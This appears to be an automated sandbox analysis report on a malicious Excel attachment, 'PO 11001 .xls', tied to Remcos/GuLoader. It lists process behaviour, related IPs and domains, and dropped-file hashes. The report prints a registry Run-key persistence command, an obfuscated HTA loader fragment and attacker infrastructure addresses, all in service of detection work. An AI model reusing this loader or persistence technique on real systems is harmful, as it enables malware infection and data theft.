                                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                        Number of analysed new started processes analysed:58
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • GSI enabled (VBA)
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:PO 11001 .xls
                                                        Detection:MAL
                                                        Classification:mal100.phis.troj.spyw.expl.evad.winXLS@72/66@4/5
                                                        EGA Information:
                                                        • Successful, ratio: 54.5%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 225
                                                        • Number of non-executed functions: 235
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .xls
                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                        • Attach to Office via COM
                                                        • Active ActiveX Object
                                                        • Active ActiveX Object
                                                        • Scroll down
                                                        • Close Viewer
                                                        • Override analysis time to 65596.3020900642 for current running targets taking high CPU consumption
                                                        • Override analysis time to 131192.604180128 for current running targets taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                        • Execution Graph export aborted for target Vaccinerende.exe, PID 3116 because there are no executed function
                                                        • Execution Graph export aborted for target mshta.exe, PID 1852 because there are no executed function
                                                        • Execution Graph export aborted for target mshta.exe, PID 3924 because there are no executed function
                                                        • Execution Graph export aborted for target powershell.exe, PID 3388 because it is empty
                                                        • Execution Graph export aborted for target powershell.exe, PID 3852 because it is empty
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        00:56:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chivey57 %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)
                                                        00:56:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chivey57 %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)
                                                        03:53:24API Interceptor109x Sleep call for process: mshta.exe modified
                                                        03:53:28API Interceptor952x Sleep call for process: powershell.exe modified
                                                        03:56:13API Interceptor1319x Sleep call for process: Vaccinerende.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        107.173.4.16SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                            xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              GFqY91CTOZ.htaGet hashmaliciousCobalt Strike, Remcos, GuLoaderBrowse
                                                                Mcib4Llptj.exeGet hashmaliciousRemcosBrowse
                                                                  SecuriteInfo.com.W64.GenKryptik.MAGC.tr.15181.21426.exeGet hashmaliciousRemcosBrowse
                                                                    2NyX8R4CZo.exeGet hashmaliciousRemcosBrowse
                                                                      wcNDx6MT9O.exeGet hashmaliciousRemcosBrowse
                                                                        1Ccw7uyuFv.exeGet hashmaliciousRemcosBrowse
                                                                          RFQ_83747384738757384754837483.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                                            178.237.33.50ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • geoplugin.net/json.gp
                                                                            Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • geoplugin.net/json.gp
                                                                            SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            geoplugin.netZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            AS-COLOCROSSINGUSZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • 192.3.101.137
                                                                            http://jeevankiranfoundationcenter.co.in/css/rrp.htmGet hashmaliciousKutakiBrowse
                                                                            • 23.94.221.14
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • 104.168.32.148
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                            • 107.172.130.147
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                                            • 192.3.101.29
                                                                            PO.xlsGet hashmaliciousRemcosBrowse
                                                                            • 104.168.32.148
                                                                            GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                            • 172.245.123.6
                                                                            Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                            • 104.168.32.148
                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 172.245.123.6
                                                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                            • 107.172.130.147
                                                                            CLOUDFLARENETUSRFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                                                            • 188.114.97.3
                                                                            https://form.asana.com/?k=SVzOAgf254NWBNm-dO6Wfg&d=1208255323046871Get hashmaliciousUnknownBrowse
                                                                            • 1.1.1.1
                                                                            SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                                            • 188.114.97.3
                                                                            SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                            • 172.67.74.152
                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 104.21.1.169
                                                                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                            • 172.67.205.129
                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.21.54.163
                                                                            https://wwvmicrosx.live/office365/office_cookies/mainGet hashmaliciousHTMLPhisherBrowse
                                                                            • 188.114.96.3
                                                                            CAPE MARS VSL'S PARTICULARS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 172.67.74.152
                                                                            ATOM86-ASATOM86NLZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            Nutzen_Unterschrift_Planen#2024.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            AS-COLOCROSSINGUSZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • 192.3.101.137
                                                                            http://jeevankiranfoundationcenter.co.in/css/rrp.htmGet hashmaliciousKutakiBrowse
                                                                            • 23.94.221.14
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • 104.168.32.148
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                            • 107.172.130.147
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                                            • 192.3.101.29
                                                                            PO.xlsGet hashmaliciousRemcosBrowse
                                                                            • 104.168.32.148
                                                                            GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                            • 172.245.123.6
                                                                            Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                            • 104.168.32.148
                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 172.245.123.6
                                                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                            • 107.172.130.147

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            7dcce5b76c8b17472d024758970a406bGelato Italiano_74695.exe.exeGet hashmaliciousUnknownBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244
                                                                            PO.xlsGet hashmaliciousRemcosBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244
                                                                            FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244
                                                                            Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244
                                                                            FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244
                                                                            Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244
                                                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244
                                                                            Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244
                                                                            QT2Q1292.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                            • 104.21.78.54
                                                                            • 172.67.216.244

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):15434
                                                                            Entropy (8bit):4.9923364673122546
                                                                            Encrypted:false
                                                                            SSDEEP:384:OSwkjh4iUxTyu/OdB8za5UUp2VoGIpN6KQkj2yg:OSJh4iUxTyu/OdB8za5UUp2V3IpNBQks
                                                                            MD5:1BCBBB637772892265D51E406EF724C8
                                                                            SHA1:E44F1C25553697B0649687F91DF3B88FE28DE4B4
                                                                            SHA-256:066A264619615C98DFE08329417C62FA4E5620EC4CA80FE51F0A0AE6E316DB4E
                                                                            SHA-512:7455B54D31D00E1D2868AFAD92D3E040F7E97F63ECC972C883147A28BF95FF75F5F3B83D01760B75DCBC0A9B2A1A8AB6B004C9E9A26FC0973565505722CDE20F
                                                                            Malicious:false
                                                                            Preview:PSMODULECACHE.............3...C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX.psd1=.......Invoke-AU3MouseClick........Get-AU3MouseCursor........Set-AU3WinTrans........Get-AU3ControlText........Get-AU3StatusbarText........Set-AU3Clip........Set-AU3Option........Invoke-AU3RunWait........Invoke-AU3ControlClick........Set-AU3WinTitle........Show-AU3WinMinimizeAllUndo........Get-AU3WinPos........Disable-AU3Control........Get-AU3WinClassList........Move-AU3Control........Set-AU3ControlFocus........Invoke-AU3MouseDown........Wait-AU3WinNotActive........Assert-AU3WinExists........Set-AU3ControlText........Get-AU3WinHandle........Get-AU3ControlFocus........Send-AU3Key........Get-AU3WinClientSize........Invoke-AU3MouseClickDrag........Invoke-AU3ControlTreeView........Move-AU3Win........Assert-AU3IsAdmin........Invoke-AU3ControlListView........Invoke-AU3MouseUp........Set-AU3WinState........Wait-AU3Win........Get-AU3Clip........Invoke-AU3Shutdown........Show-AU3WinActivate........Get-AU3WinState..

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):0.34726597513537405
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlll:Nll
                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                            Malicious:false
                                                                            Preview:@...e...........................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cookienetbookinetcahce[1].hta

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):118450
                                                                            Entropy (8bit):2.544351810400321
                                                                            Encrypted:false
                                                                            SSDEEP:96:Ea+M73rNp6fEVNp60WU1Qgr8l+Qu3i9pNp6R6Np6Er5BfqVNp61AT:Ea+Q35puEnp08QgocyNpJpxCnpxT
                                                                            MD5:C443D03E485232A860B726FC83593004
                                                                            SHA1:6B556D04962638694402D15B7FA24B6BD6B1D1F4
                                                                            SHA-256:F99757C98007DA241258AE12EC0FD5083F0475A993CA6309811263AAD17D4661
                                                                            SHA-512:3A7201A36B2875C59DB6E41369F52C941CD5D0D51BF90FCA31ABF05F71C76A7D5A6305667649AE8D2F63A3951A44643402853C096B07143531EAA6F6C5BB7C34
                                                                            Malicious:true
                                                                            Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCrIPT%252520LaNGuage%25253D%252522VbsCRiPt%252522%25253E%25250ADiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                            Category:dropped
                                                                            Size (bytes):990768
                                                                            Entropy (8bit):6.298838855552093
                                                                            Encrypted:false
                                                                            SSDEEP:12288:5Ly0W0exb+S7/6eALmQXhts30QmskXnnAEkINz3WSVgl:5Ly05wCmQXw30Ek3AgNz3Sl
                                                                            MD5:450228D72F9F726B645C55BBBC6DB905
                                                                            SHA1:B26075C51A4681F2FF7407188F5E9480545A7ACA
                                                                            SHA-256:9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE
                                                                            SHA-512:4795D090447D237CBE1A044FFE78E8CD0C9BE358DF778673B4713EAB2C324056A7701D22B827B95B2413845089FA71AC81A4F47CC8BCDBABAD34845E64B4E090
                                                                            Malicious:true
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*......=3............@.................................7/....@..........................................................................................................................................................text...mb.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):962
                                                                            Entropy (8bit):5.013130376969173
                                                                            Encrypted:false
                                                                            SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                            MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                                                            SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                                                            SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                                                            SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                                                            Malicious:false
                                                                            Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82C6F378.emf

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                            Category:dropped
                                                                            Size (bytes):5596528
                                                                            Entropy (8bit):2.9627880151323387
                                                                            Encrypted:false
                                                                            SSDEEP:12288:Nft3bECFzKzjLBMc0GtIRabD8R1AZJBa5jB7gOaOGVIl00xh600msetQr00ujh60:N5ACi8BiJK+nIlDh6osetQrsjh60
                                                                            MD5:C8FF65340D86E7546ED74F2AEA89FF70
                                                                            SHA1:C3C02AC92015D94D4D68479DADB5CD110C6CF8C9
                                                                            SHA-256:58B91D40032E4C9C693DDACBA27C24C875EBBF2F9F6C9FFA7A10991FC1049C4C
                                                                            SHA-512:385060117D6AE29EAC9CD9B6F69E50DF6FD86A84095AA2FA4DC14F2F3AAA27E2A6FC8E6F0E03F4D53E3A5A1038EF639B53BD44188E943A830005176F201D5008
                                                                            Malicious:false
                                                                            Preview:....l...............;............H...@.. EMF....peU.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF2F4046.emf

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                            Category:dropped
                                                                            Size (bytes):5596528
                                                                            Entropy (8bit):2.9627880151323387
                                                                            Encrypted:false
                                                                            SSDEEP:12288:Nft3bECFzKzjLBMc0GtIRabD8R1AZJBa5jB7gOaOGVIl00xh600msetQr00ujh60:N5ACi8BiJK+nIlDh6osetQrsjh60
                                                                            MD5:C8FF65340D86E7546ED74F2AEA89FF70
                                                                            SHA1:C3C02AC92015D94D4D68479DADB5CD110C6CF8C9
                                                                            SHA-256:58B91D40032E4C9C693DDACBA27C24C875EBBF2F9F6C9FFA7A10991FC1049C4C
                                                                            SHA-512:385060117D6AE29EAC9CD9B6F69E50DF6FD86A84095AA2FA4DC14F2F3AAA27E2A6FC8E6F0E03F4D53E3A5A1038EF639B53BD44188E943A830005176F201D5008
                                                                            Malicious:false
                                                                            Preview:....l...............;............H...@.. EMF....peU.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................&...........................%...........................6...............%...........L...d...................................!...

                                                                            C:\Users\user\AppData\Local\Temp\1p04mv1k.243.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\RESA499.tmp

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 07:53:31 2024, 1st section name ".debug$S"
                                                                            Category:dropped
                                                                            Size (bytes):1328
                                                                            Entropy (8bit):3.9836859999630745
                                                                            Encrypted:false
                                                                            SSDEEP:24:HBe9EurTIXYadHSwKdNWI+ycuZhNoakSEPNnqSqd:or2pJKd41uloa3EqSK
                                                                            MD5:2ABE9A3665514F3D31543353D687E35E
                                                                            SHA1:7977B21DBCACB46BEACFEAAE04B997CB82506A0C
                                                                            SHA-256:23D630AD82C50D657F2D665FC255B7A008C909D780D87D67C493F27876A3427A
                                                                            SHA-512:5AC212FC78B166A87E3048F433CEB41CF68B038759B8E4C01CEF318BCCE2CCAAE64A356AE63C732CB1D9D3102E52290A533D82FCE09A68F2896AEBE0FB9425D5
                                                                            Malicious:false
                                                                            Preview:L....X.f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP................[D..-..@$.....w...........4.......C:\Users\user\AppData\Local\Temp\RESA499.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.m.4.1.l.s.y.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                            C:\Users\user\AppData\Local\Temp\RESF72C.tmp

                                                                            Download File
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 07:53:53 2024, 1st section name ".debug$S"
                                                                            Category:dropped
                                                                            Size (bytes):1328
                                                                            Entropy (8bit):4.0048887096256225
                                                                            Encrypted:false
                                                                            SSDEEP:24:Hae9E2UJOkEk+dH2YwKdNWI+ycuZhNOakSmPNnqSqd:a8kO+Kd41ulOa3aqSK
                                                                            MD5:757772D5E195886CBB8840BC84A3418F
                                                                            SHA1:711E6D880E20D43D9F3EE45C4ADB40962B198A18
                                                                            SHA-256:5A9D557EEA0A797C260E255446E0C2FAF9BEE34058583137424E873A6C9B3DC5
                                                                            SHA-512:E5063D9DF3D369699A3744D03E70B44A51E7D0CC068085C7EBB6D8DFE7C3B213ACDE1066BEE41F9402DCF987279426214718A3E3ADFDE320316BEF420197D03F
                                                                            Malicious:false
